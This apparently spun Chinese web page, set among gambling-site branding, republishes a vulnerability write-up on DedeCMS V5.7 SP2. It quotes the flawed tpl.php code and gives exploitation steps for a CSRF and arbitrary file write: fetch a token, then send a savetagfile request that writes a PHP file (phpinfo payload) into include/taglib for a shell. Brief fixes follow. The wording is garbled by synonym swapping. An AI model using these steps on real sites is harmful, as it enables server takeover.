署理加盟 2019全新署理方案 挣钱+省钱左右开弓,独立渠道,丰盛赢利!

您现在的方位: unibet网 > 织梦大学 > 织梦安全 >

dedecms V5.7 SP2 友情链接CSRF+恣意文件写入缝隙

来历:不知道 发布时刻:2019-04-02热度:我要谈论
DedeCMS V5.7 SP2版别中tpl.php存在代码履行缝隙,存在CSRF缝隙,通过恳求友情链接的办法,诱使管理员点击,然后从 Referer 中拿到 后台途径,进而以管理员的身份写一句话到服务器上 GetShell 。...

unibet注册unibet淘宝店开业,好礼送不断

DedeCMS V5.7 SP2版别中tpl.php存在代码履行缝隙,攻击者可使用该缝隙在添加新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5.7 SP2版别程序,到发稿,缝隙仍然存在。

缝隙概况

织梦默许的后台地址是/dede/,当然也能够被更改,到时候依据网站具体情况替换默许后台地址即可。

dede/tpl.php中第251行到281行

 

csrf_check();

 

if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))

 

{

 

    ShowMsg('文件名不合法,不允许进行操作!', '-1');

 

    exit();

 

}

 

require_once(DEDEINC.'/oxwindow.class.php');

 

$tagname = preg_replace("#\.lib\.php$#i", "", $filename);

 

$content = stripslashes($content);

 

$truefile = DEDEINC.'/taglib/'.$filename;

 

$fp = fopen($truefile, 'w');

 

fwrite($fp, $content);

 

fclose($fp);

 

1.因为dedecms全局变量注册的特性,所以这儿的content变量和filename变量可控。

2.能够看到将content直接写入到文件中导致能够getshell。可是这儿的文件名通过正则表达式,所以必需求.lib.php完毕。

留意: 这儿还有一个csrf_check()函数,即恳求中必需求带token参数。

缝隙使用

1.首要获取token 拜访 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值 

dedecms V5.7 SP2 友情链接CSRF+恣意文件写入缝隙

然后拜访 :

域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

dedecms V5.7 SP2 友情链接CSRF+恣意文件写入缝隙

shell:域名 + /include/taglib/moonsec.lib.php

缝隙修正

1.制止/include/taglib/此处写入文件。

2.过滤歹意标签

3.删去dede/tpl.php 文件

本文地址:https://www.m88nob1.com/dedecms_aq/1616.html

    责任编辑:unibet网

    宣布谈论

    谈论列表(条)